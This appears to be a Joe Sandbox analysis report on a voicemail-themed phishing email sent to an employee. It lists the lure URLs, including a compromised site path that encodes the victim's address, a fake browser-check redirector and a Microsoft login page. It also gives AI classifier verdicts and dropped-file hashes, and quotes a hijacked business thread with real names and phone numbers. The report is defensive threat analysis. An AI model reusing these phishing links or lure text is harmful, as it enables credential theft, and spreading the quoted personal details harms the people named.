                                                        https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                          unknown
                                                          https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                            unknown
                                                            http://condominioanacarolina.com.br/lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29tfalse
                                                              unknown
                                                              http://condominioanacarolina.com.br/favicon.icofalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.comfalse
                                                                unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                IP
                                                                192.168.2.16
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1556705
Start date and time: 2024-11-15 21:11:45 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Sample name: ee0b6b037b16b54632b6b37d1fb72727.eml
Detection: MAL
Classification: mal48.winEML@60/57@89/331
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .eml
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 52.109.89.19, 2.19.126.160, 2.19.126.136, 20.189.173.5, 172.217.16.195
                                                                • Excluded domains from analysis (whitelisted): omex.cdn.office.net, onedscolprdwus04.westus.cloudapp.azure.com, slscr.update.microsoft.com, weu-azsc-000.roaming.officeapps.live.com, clientservices.googleapis.com, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com, login.live.com, officeclient.microsoft.com, a1864.dscd.akamai.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, omex.cdn.office.net.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: ee0b6b037b16b54632b6b37d1fb72727.eml
Input | Output
                                                                URL: email Model: Joe Sandbox AI
                                                                {
                                                                    "explanation": [
                                                                        "Suspicious sender domain 'generous-minds.com' doesn't match the claimed identity 'Audio.calls'",
                                                                        "Contains suspicious long encoded URL that attempts to mask its true destination",
                                                                        "Subject line about voicemail doesn't match the email thread content, indicating a spoofed conversation"
                                                                    ],
                                                                    "phishing": true,
                                                                    "confidence": 9
                                                                }
                                                                {
                                                                    "date": "Fri, 15 Nov 2024 17:21:09 -0800", 
                                                                    "subject": "[External] - MONTROSE-ENV: You have a Voice Mail  (if)", 
                                                                    "communications": [
                                                                        "You don't often get email from rbeuk@generous-minds.com. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification>\n\n<https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t>\n\n[cid:C91B23753AA0697700D1@WINCLJBGQJP]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n54054\n\n\n\n\n\n\nYes  Have not received estimate. Thanks Cyndi.\n\n\nThank you,\nJohn M Herrmann\nSERVICE MANAGER\nHill Idealease, LLC\n740-633-3011(Office)\n724-531-1195(Cell)\n740-633-2140(Fax)\n------------------\n\n\n\n", 
                                                                        "From: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com>\nSent: Wednesday, May 3, 2023 11:13 AM\nTo: John Herrmann <jherrmann@hillidealease.com>\nCc: Richard Reuille <rreuille@hillidealease.com>; Lisa Zwiesler <lzwiesler@hillidealease.com>\nSubject: RE: IDEALEASE 322913 / 321806\n\nUnit 321806 is in the shop.\n\nUnit #322913  Did you ever get a quote for this one, I seen it was started but looks like the parts were put on,  I will have them get this done ASAP.\n\n\nThank you ~ and make it a great day.\n\n\nCyndi Matvya\nService Administrator & Accounts Receivable\nShamrock Utility Trailers, Inc\n500 North Center Avenue, New Stanton, PA  15672<500%20North%20Center%20Avenue,%20New%20Stanton,%20PA%20%2015672>\n724-925-9200\n724-925-6999 FAX\n\n\n\n", 
                                                                        "From: John Herrmann <jherrmann@hillidealease.com<mailto:jherrmann@hillidealease.com>>\nSent: Wednesday, May 3, 2023 10:53 AM\nTo: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com<mailto:cmatvya@shamrockutilitytrailer.com>>\nCc: Richard Reuille <rreuille@hillidealease.com<mailto:rreuille@hillidealease.com>>; Lisa Zwiesler <lzwiesler@hillidealease.com<mailto:lzwiesler@hillidealease.com>>\nSubject: IDEALEASE 322913 / 321806\n\nGood morning Cyndi  I wanted to check and see the status of the units 322913 and 321806 we have there for box repairs.\n\n\nThank you,\nJohn M Herrmann\nSERVICE MANAGER\nHill Idealease, LLC\n<span\n________________________________\nCONFIDENTIALITY NOTICE: The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential, proprietary and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments and the reply from your system. If you are not the intended recipient, you are hereby notified that any disclosure, use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.\n"
                                                                    ], 
                                                                    "from": "\"Audio.calls\" <rbeuk@generous-minds.com>", 
                                                                    "to": "kelly.swanson@montrose-env.com", 
                                                                    "attachements": [
                                                                        "ilil.pdf"
                                                                    ]
                                                                }
                                                                URL: Email Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "To listen to your voicemail, please click the button below",
                                                                  "prominent_button_name": "Listen Now",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": true,
                                                                  "has_visible_qrcode": false
                                                                 }
                                                                 ```
                                                                URL: Email Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": [
                                                                    "Generous Minds"
                                                                  ]
                                                                 }
                                                                 ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Confirming your browser to ensure a secure browsing experience.",
                                                                  "prominent_button_name": "unknown",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": false,
                                                                  "has_visible_qrcode": false
                                                                 }
                                                                 ```
                                                                URL: http://condominioanacarolina.com.br Model: Joe Sandbox AI
                                                                {
                                                                    "typosquatting": false,
                                                                    "unusual_query_string": false,
                                                                    "suspicious_tld": false,
                                                                    "ip_in_url": false,
                                                                    "long_subdomain": false,
                                                                    "malicious_keywords": false,
                                                                    "encoded_characters": false,
                                                                    "redirection": false,
                                                                    "contains_email_address": false,
                                                                    "known_domain": false,
                                                                    "brand_spoofing_attempt": false,
                                                                    "third_party_hosting": false
                                                                }
                                                                URL: http://condominioanacarolina.com.br
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Confirming your browser to ensure a secure browsing experience.",
                                                                  "prominent_button_name": "unknown",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": true,
                                                                  "has_urgent_text": false,
                                                                  "has_visible_qrcode": false
                                                                 }
                                                                 ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": []
                                                                 }
                                                                 ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Confirming your browser to ensure a secure browsing experience.",
                                                                  "prominent_button_name": "unknown",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": false,
                                                                  "has_visible_qrcode": false
                                                                 }
                                                                 ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": [
                                                                    "Cloudflare"
                                                                  ]
                                                                }
                                                                ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Ensuring your safety by conducting browser checks.",
                                                                  "prominent_button_name": "unknown",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": false,
                                                                  "has_visible_qrcode": false
                                                                }
                                                                ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": []
                                                                }
                                                                ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": [
                                                                    "Cloudflare"
                                                                  ]
                                                                }
                                                                ```
                                                                URL: https://login.microsoftonline.com Model: Joe Sandbox AI
                                                                {
                                                                    "typosquatting": false,
                                                                    "unusual_query_string": false,
                                                                    "suspicious_tld": false,
                                                                    "ip_in_url": false,
                                                                    "long_subdomain": false,
                                                                    "malicious_keywords": false,
                                                                    "encoded_characters": false,
                                                                    "redirection": false,
                                                                    "contains_email_address": false,
                                                                    "known_domain": true,
                                                                    "brand_spoofing_attempt": false,
                                                                    "third_party_hosting": false
                                                                }
                                                                URL: https://login.microsoftonline.com
                                                                URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Sign in",
                                                                  "prominent_button_name": "Next",
                                                                  "text_input_field_labels": [
                                                                    "Email, phone, or Skype",
                                                                    "No account? Create one!",
                                                                    "Can't access your account?"
                                                                  ],
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": false,
                                                                  "has_visible_qrcode": false
                                                                }
                                                                ```
                                                                URL: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2 Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": [
                                                                    "Microsoft"
                                                                  ]
                                                                }
                                                                ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Conducting security checks to protect your browser.",
                                                                  "prominent_button_name": "unknown",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": false,
                                                                  "has_visible_qrcode": false
                                                                }
                                                                ```
                                                                URL: https://mrwa.ungonditc.com/aIEqPG/#Dkelly.swanson@montrose-env.com Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": [
                                                                    "Cloudflare"
                                                                  ]
                                                                }
                                                                ```
                                                                URL: https://microsoft.com Model: Joe Sandbox AI
                                                                {
                                                                    "typosquatting": false,
                                                                    "unusual_query_string": false,
                                                                    "suspicious_tld": false,
                                                                    "ip_in_url": false,
                                                                    "long_subdomain": false,
                                                                    "malicious_keywords": false,
                                                                    "encoded_characters": false,
                                                                    "redirection": false,
                                                                    "contains_email_address": false,
                                                                    "known_domain": true,
                                                                    "brand_spoofing_attempt": false,
                                                                    "third_party_hosting": false
                                                                }
                                                                URL: https://microsoft.com
                                                                URL: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0 Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "contains_trigger_text": true,
                                                                  "trigger_text": "Your current User-Agent string appears to be from an automated process, if this is incorrect, please click this link:",
                                                                  "prominent_button_name": "United States English Microsoft Homepage",
                                                                  "text_input_field_labels": "unknown",
                                                                  "pdf_icon_visible": false,
                                                                  "has_visible_captcha": false,
                                                                  "has_urgent_text": true,
                                                                  "has_visible_qrcode": false
                                                                }
                                                                ```
                                                                URL: https://www.microsoft.com Model: Joe Sandbox AI
                                                                {
                                                                    "typosquatting": false,
                                                                    "unusual_query_string": false,
                                                                    "suspicious_tld": false,
                                                                    "ip_in_url": false,
                                                                    "long_subdomain": false,
                                                                    "malicious_keywords": false,
                                                                    "encoded_characters": false,
                                                                    "redirection": false,
                                                                    "contains_email_address": false,
                                                                    "known_domain": true,
                                                                    "brand_spoofing_attempt": false,
                                                                    "third_party_hosting": false
                                                                }
                                                                URL: https://www.microsoft.com
                                                                URL: https://www.microsoft.com/en-us/microsoft-365/outlook/email-and-calendar-software-microsoft-outlook?deeplink=%2fowa%2f&sdf=0 Model: Joe Sandbox AI
                                                                ```json
                                                                {
                                                                  "brands": [
                                                                    "Microsoft"
                                                                  ]
                                                                }
                                                                ```
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):231348
                                                                Entropy (8bit):4.391437478040974
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3DCCDC55441FE397F24BD462F1857611
                                                                SHA1:8149C25B58ECF9F8FF9B546AB1D25B06704AE3D2
                                                                SHA-256:099E51D16FE97EED148C57BB8B268BD91528451AD503D912814FF7302A3F39CC
                                                                SHA-512:F72AC93D8FDB24DB95A02CFE68253D36A254AD9FDF41B52D3E019C215E09428A51D081D6A1A0A516E95B3245C4320C8D750E97B3F88B6FC87CA8EA3585C92630
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):322260
                                                                Entropy (8bit):4.000299760592446
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CC90D669144261B198DEAD45AA266572
                                                                SHA1:EF164048A8BC8BD3A015CF63E78BDAC720071305
                                                                SHA-256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
                                                                SHA-512:16F8A8A6DCBAEAEFB88C7CFF910BCCC71B76A723CF808B810F500E28E543112C2FAE2491D4D209569BD810490EDFF564A2B084709B02963BCAF6FDF1AEEC59AC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with no line terminators
                                                                Category:modified
                                                                Size (bytes):10
                                                                Entropy (8bit):2.4464393446710155
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:23CDD3C2BF36F44AC865D5C2EC815FC3
                                                                SHA1:F93B54AC79770F6E9B8883C1F966852A4711A69C
                                                                SHA-256:FA007B3E07C5849DC82745D45A783C1A88DC69FB6CB8DD01FB4764887A23B455
                                                                SHA-512:49127BE20B1479360BC2365BCD4BEB6855DD2FA92513728C9A5F2CA9050B749ADADEF59FE8B25CF32D0F9186DADF28BFEEBC09F5B97AFFEF311E7B3BC09DE7BE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:1731701545
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):180288
                                                                Entropy (8bit):5.290980264446109
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AADFA375FC5939560C91A6EBB406292A
                                                                SHA1:748C49323533EE0E9A4285E053129E36D3B9A79D
                                                                SHA-256:201384849706848666E4B07E754BEEC23CF82B7F58E8A7AC75E1E535F96F7E20
                                                                SHA-512:2AE23B97C94A7BDA65AA996744AF557B26F325A5658944EBD633173972E2519E0AC608CD446C33D2AE26F090E654F244D82C1DA215D9F20EB4D94A2E00A9CB93
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-11-15T20:12:21">.. Build: 16.0.18223.40125-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                Category:dropped
                                                                Size (bytes):4096
                                                                Entropy (8bit):0.09216609452072291
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F138A66469C10D5761C6CBB36F2163C3
                                                                SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                                SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                                SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite Rollback Journal
                                                                Category:dropped
                                                                Size (bytes):4616
                                                                Entropy (8bit):0.13760166725504608
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A8709B9197F5C93A2DED9AA5A8EC9FA2
                                                                SHA1:89AA23DA38F7DDF96D84C4A8F39EAB7EBB84AE21
                                                                SHA-256:AD11D285461A4BE2E4C06265032BC6B4C365EBD9AFF8C7A3C623BC255A26CD75
                                                                SHA-512:1254B6702FB4EA58CCAA12C88C4D04A76F0B2CCF6463306858F402C9A85F981567209C5FE928DC6B36AE240D5E9BE40B3D295443ACBEB863833478200B802EEF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.04449651975591713
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7A8DF2A8DDAC9FC5538F2C436DFD07BD
                                                                SHA1:333957C55A1061F324D8AEED1D0DD985DE78A1FA
                                                                SHA-256:6A76748184F88BBBF28CD953817B14938BCB851E2EDE139B4C5E54954CF1D5BE
                                                                SHA-512:8801049356CD4AC599FFFE5FBDE65A51C02AA49CF5B5A314C32A8E4786D1A0AD8CDC3ED4210D95C40558D9C2B715EFF85CB83781725A158D2BBEACF8B6426661
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:SQLite Write-Ahead Log, version 3007000
                                                                Category:dropped
                                                                Size (bytes):45352
                                                                Entropy (8bit):0.39459034819233635
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B8593D356F7726E6A4EBC23A41A7FEF8
                                                                SHA1:9171F47AD8BDA28860980F03DD6E7C6756A5656F
                                                                SHA-256:7AF38E837660ED60E99DC8907D730D1F2B4630E52875CD5152D729F525B003A2
                                                                SHA-512:1E55425B56FB257FEB1B06DF6C514634145F763E4A3460659CC63715ECAE4E596F1C25004A1D9AE5BF895A728E684F80F26C06645F491CD697F5C1D1D1A1835B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:PNG image data, 1120 x 540, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):82368
                                                                Entropy (8bit):7.8980673829519885
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CD30258B77CF3300C43D7984FC667976
                                                                SHA1:FBF893AE35B7CA03C82F70D665515D962C5321A4
                                                                SHA-256:344938F2E50CE50316A1400FD8965085DD859889721D47756645E6CA532E895D
                                                                SHA-512:C6FE276EA27BC51F06A055C2F53B8921C30A411796069B91E24C5C0624408749423787A2C441D4D4F1709604CDB166C3044BF5296CAD8A3E67DF6365FF7BD8B7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):10716
                                                                Entropy (8bit):3.6527240776470755
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E68A3C8689F81B57D4AF7537BB38BE5C
                                                                SHA1:CE22CA4E70DEF93DB6EF6C0E78B5D23B7FBF1D26
                                                                SHA-256:3BE7F3B5E06B480E6ED05A9835E54D8A5A8EA70EF3B62A22817A6A9FD5D60A63
                                                                SHA-512:53DBE687EC633DFA8E9F2CF3CCB777DF61F13FA2107A7C87C0F7301C3BDA02B8D5D193CE13DB7AC747A49D1233EFD130923FBD04C29A4CA499642B66431A6381
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:You don't often get email from rbeuk@generous-minds.com. HYPERLINK "https://aka.ms/LearnAboutSenderIdentification"
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:ASCII text, with very long lines (859), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):20971520
                                                                Entropy (8bit):0.007811362792378627
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8261F74991F01BB8F8AB92E02CA8B730
                                                                SHA1:E14FE656A160D04C34CE1AA9516E19F2F81BD1A7
                                                                SHA-256:7B117EB9D1D2C72D0A75AB9FEEF279A132E861352451257961AAA8237B4D2903
                                                                SHA-512:C60D2731FA548A5DB1E7311A64D7122C77F1E221C36925A5B4879AB3C73252D25552AD9D48733F826580AD426751D504900E6B1C8AE8A854818D73926496DCA1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/15/2024 20:12:19.053.OUTLOOK (0x191C).0x1B08.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":21,"Time":"2024-11-15T20:12:19.053Z","Contract":"Office.System.Activity","Activity.CV":"Z+9PckenVUC9NbXjc6bTog.10.1","Activity.Duration":143,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/15/2024 20:12:19.053.OUTLOOK (0x191C).0x1B08.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-11-15T20:12:19.053Z","Contract":"Office.System.Activity","Activity.CV":"Z+9PckenVUC9NbXjc6bTog.10","Activity.Duration":463,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.F
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):20971520
                                                                Entropy (8bit):0.0
